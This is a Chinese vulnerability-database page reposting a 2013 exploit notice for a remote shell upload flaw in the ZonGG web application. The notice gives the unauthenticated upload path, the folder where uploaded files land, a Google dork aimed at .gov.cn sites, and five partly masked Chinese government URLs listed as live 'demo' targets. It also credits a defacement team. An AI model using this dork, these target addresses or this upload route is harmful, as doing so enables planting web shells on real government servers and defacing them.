ZonGG Remote Shell Upload Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044639 漏洞类型
发布时间 2013-08-07 更新时间 2013-08-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080062
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title:ZonGG  Remote Shell Upload Vulnerability              |
| [+] Google Dork:site:.gov.cn inurl:"/zongg/"                            |
| [+] Exploit Author: Ashiyane Digital Security Team                      |
| [+] Tested on: Windows,Linux                                            |
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
| [+]Vendor Home :http://zon.cn/down                                      |
|-------------------------------------------------------------------------|
| [+] Exploit:                                                            |
| [+] http://localhost/[path]/zongg/upload.asp                            |
|-------------------------------------------------------------------------|
| [+] Demo site:
| [+] http://www.sXz.gov.cn/zongg/upload.asp
| [+] http://www.juX.gov.cn/Zongg/upload.asp
| [+] http://www.sqXz.gov.cn/zongg/upload.asp
| [+] http://www.hXianedu.gov.cn/zongg/upload.asp
| [+] http://www.sqXz.gov.cn/zongg/upload.asp
|-------------------------------------------------------------------------|
| [+] Uploaded Files:                                                     |
| [+] http://localhost/upimg/filename                                     |
|-------------------------------------------------------------------------|
| [+] Discovered By :hossein19123 & Ba3bak                                |
| [+]Greetz to: My Lord Allah
| [+]Sp Tnx To:PrinceofHacking , C4T , V1R4N64R , MR.SAMAN, Tr0janman
| [+]Ashiyane Security [ Researcher Team AND Deface Team ]
|-------------------------------------------------------------------------|
| [+]Home:Ashiyane.Org                                                    |
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|